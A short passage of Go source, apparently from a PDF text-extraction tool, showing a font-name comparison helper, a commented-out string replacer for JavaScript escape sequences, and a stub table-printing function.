return strings.TrimSuffix(f1, ",Italic") == strings.TrimSuffix(f2, ",Italic") || f1 == "Symbol" || f2 == "Symbol" || f1 == "TimesNewRoman" || f2 == "TimesNewRoman"
}
var jsFix = strings.NewReplacer(
// `\u003c`, `<`,
// `\u003e`, `>`,
// `\u0026`, `&`,
// `\u0009`, `\t`,
)
func printTable(name string, table []Inst) {
_ = strconv.Atoi
}
| parsePage |